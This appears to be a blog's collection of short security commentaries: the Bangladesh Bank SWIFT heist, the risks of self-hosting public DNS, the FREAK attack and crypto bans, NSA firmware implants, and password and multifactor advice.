The next time anyone tells you that they have built a „Secure“ system, get them to read this article.
Source: BAE Systems Threat Research Blog: Two bytes to $951m
An unknown number of people with a lot of easily acquired knowledge, but not so common skills, developed and deployed a system of hacks to manipulate a „secure“ banking system to transfer almost a billion dollars to accounts unknown. A large amount of this money is now „accounted for“, whatever that means, while 81 Million Dollars are still missing. That looks like a pretty good return on investment if you’re not too worried about illegalities or you consider it just liberating the money from robber banks.
Of course, many will say „our security standards are better than those in Bangladesh“ but those people are just trying to reassure those who cannot, for whatever reason, understand the signals generated by this particular case.
An incredible number of systems rely on the key system-parts misused in this hack. I would not have believed it until I saw it, so many systems rely on reading and writing text files from some location, often a network share, and these files are easily manipulated if due attention is not paid to the security of those files.
Just last week I had an application development team who could not, or would not because of time constraints, understand why it was a bad idea to let a server inside the secure zone reach out to a server on the internet in order to automatically download some code. The number of ways in which their deployment scheme could be hacked into and misused was mind-boggling and yet, they considered it not only safe, but also perfectly normal. Someone is going to make a lot of money out of their overly relaxed attitude if they should draw the wrong kind of attention.
More than interesting take on the „we have to have full control of our DNS“ discussions found in many companies. There are of course many reasons why people inside the organisation will view moving DNS Services to some provider as wrong, such as job security but as more-and-more companies succumb to the „Cloud“ hype, the more relevant „Besides, as organizations continue to move their services to the cloud, why would you have the name resolution of those resources tied to some legacy, on-premise server?“ is going to become.
Quelle: Why You Shouldn’t Be Hosting Public DNS | Postmodern Security
Hopefully the ridicule poured upon the UK’s Prime Minister, Cameron, regarding his desire to ban cryptography (or at least water it down) will have caused all parties to put their heads back on the right way round. Just in case any government is still planning such a move, here are a few words of caution to anyone willing to listen:
A Few Thoughts on Cryptographic Engineering: Attack of the week: FREAK (or ‚factoring the NSA for fun and profit‘).
Let’s all give a hearty round of applause for whoever thought it would be a good idea to let this kind of danger out into the wild.
NSA Hacked Firmware
Now that the technology is out there and has been found, any bad guys can get their hands on the technology and apply it for their own purposes.
Remember, any weapon is a weapon you don’t want in the hands of your enemies so don’t go handing them out like candy.
No one can go back over x years of penetration logs, let alone in six days.
Then, there is this aspect:
There is that familiar smell in the air of someone trying to cover their ar*e after the bull has done it’s business and bolted.
Posted from WordPress for Android
Crash Override Network — Account Security 101: Passwords, Multifactor,….
I know, it’s hard to do somethings right. I also know there’s a lot of bad advice out there. This is pretty good though, for now. One of the problems with security is that as soon as a method becomes popular, it becomes a target for the bad guys/gals/ones.
Some of these points will (famous last words) remain relevant until passowrds become a thing of the past.